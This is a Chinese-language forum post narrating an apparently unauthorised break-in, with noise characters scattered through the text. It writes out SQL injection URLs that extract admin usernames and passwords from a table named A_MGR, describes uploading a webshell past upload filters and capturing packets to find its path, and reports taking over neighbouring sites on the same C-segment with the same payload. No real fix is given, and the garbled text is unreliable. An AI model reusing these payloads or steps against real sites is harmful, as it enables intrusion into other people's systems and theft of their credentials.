发现一个注入点8 a3 v! f' Q: @: P$ H- g! P* t/ y
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833896 E3 W2 B0 c( T) e% A! f, j
$ Z( b! Z! K5 K+ u% e v1 C4 D
习惯性的加’having1=1--' o- ] ~0 S8 x$ \
; d( F0 o3 P; B: whttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—, N$ I/ a' H( X( |: ]5 n
( ?6 g- j) @/ B% s01 n! J* X% y) q4 l( b g) g
8 x9 n$ N& v( S3 k* V; G, ?7 V& U爆出Diary_A.dl_Title(这时候很激动啊)6 t& P3 K. F1 u
" z1 `; q- e1 q6 R% k6 ~
那么继续
" f# }. ~: a U1 G9 L& W% Rhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—. ]% x8 H& N1 ^" O8 e" x
! f; K8 x5 J3 J c继续,一直爆下去
" B& f8 w; P7 n/ Z/ g6 G6 |( S6 }. ^& \2 \* V
爆到几个字段和表段 但是没找到需要的管理用户的字段9 }) A7 _" z, t6 Z% ^1 m5 B, ]" v
% H4 o, Z3 f& c1 s! w
蛋疼了 怎么办 然后去后台登陆页看源码
! m' A( [3 f2 n! ~2 l, }' b, ]6 Y% y1 y, Y8 ^8 X
0
: l7 P# y5 J8 Y1 ]" h# D
) a0 ?/ U$ B5 Q* M$ r( AInput name= “ADUID”- x$ ?0 L9 z7 Q0 g
Input name= “ADPWD”
" ~5 ?' i2 G! a+ O5 Q g5 v8 P+ y1 S5 g9 J7 \: h) V
很幸运 找到了字段那就继续' s' r! m" W% j5 f
找到之后开始爆用户
* k# u& F; Q9 Shttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—5 [2 \" A) F: Z6 v2 Y5 M' S3 P
爆密码
& S; R @4 N: Z/ Fhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
+ P& ^% X n# _, G测试了下 这个注入点只能爆到文章哪里的表
# w* ~& f% M$ H5 U2 d, P
. ^) p; f% S: ?1 e9 K+ M头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
/ u j$ J/ e4 f+ p/ G! ]4 Z2 _) } t: Q6 K7 U
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
3 } @! V' G3 @6 ^/ Q/ C# Z- I9 |$ G! [# {+ W) |7 @
4735 ^- r. A& A3 m @
: ?. C7 x1 @4 j6 L8 Q: z! h! a- P2 ?进后台* t- `# u, r8 ~0 I' j, H
h/ c1 Z. P! b4 T8 `4 }6 e: ^) ?0 M: ~2 H" X
发现几个上传点 有的地方不能上传 而且防止恶意代码- M% i& z- P7 p$ n: j0 K; A9 M0 p
/ A( O. D( r k, S5 q
没办法 各种百度各种找大牛 找到一只好像可以突破的马
; S+ a X: G4 P2 \7 j# |6 k2 @8 G9 g1 z1 x( Y
1 d( w x' R7 O5 m# K, }2 d
在系统管理那里直接上传 不过没有显示地址
( M2 D% E$ }( j0 f) {5 `; ~" L+ C) s
再上传一次 抓包 搞定OK8 j' Y! d6 j* }" L% B; L
3 k0 ^/ \( C0 [2 ?
+ [$ w- `8 p/ Q
. j& T+ J9 N+ \) u1 B' L2 _472" X" c' q: s5 @6 ^
& S/ J$ `9 z, H. Q' A6 ?( A8 p晚上不行了 去睡觉。。。
* w# |" v2 z* G7 i第二天刚起床 闲的没事做继续日站吧 / b; d9 O$ [4 N
, R e! I9 Q! g S找个站 就把这个站的旁c扫了下' a4 ?# u% Z' R2 t7 @2 v, G. r9 \2 K. F
, S) W# n( q C; W发现c段也有一个购物站 ,然后还和这个站的模板差不多' ]% V/ J) H5 H1 E( M6 A
$ x9 d N$ p3 g* |
就找到会员登录口测试
0 p1 P# o4 C% t: Y+ d" H6 i* t' L
. {5 V. J# W% R9 d. @9 {* V'and (select top 1 MGR_UID from A_MGR)>0—( A; @ c1 H) g" Z {0 O# j, h
果断爆到了 这时候我很激动 通杀1 x* k# |& o. k1 t d& T
' W& _9 `1 b$ Z0 I& L再次翻c段6 s" k9 L% V6 g) M- T3 P1 A% M
% M4 }4 Z9 ]2 |( k6 O
翻出几个站 都成功拿下
9 i, G+ V' \ X: a/ [6 i, u+ z$ l2 R* q7 F" E
+ N# G( z" F" |' g r8 E: G% h/ m* C
修复方案:
0 [& P: w4 r* U8 Y9 q0 n( P他们比我专业
5 ?1 Q* T& c# w* O2 }
; k5 J- S# C/ C; R6 H4 g! K0 D; W5 Q7 [
, {) N6 B- k9 X6 c
|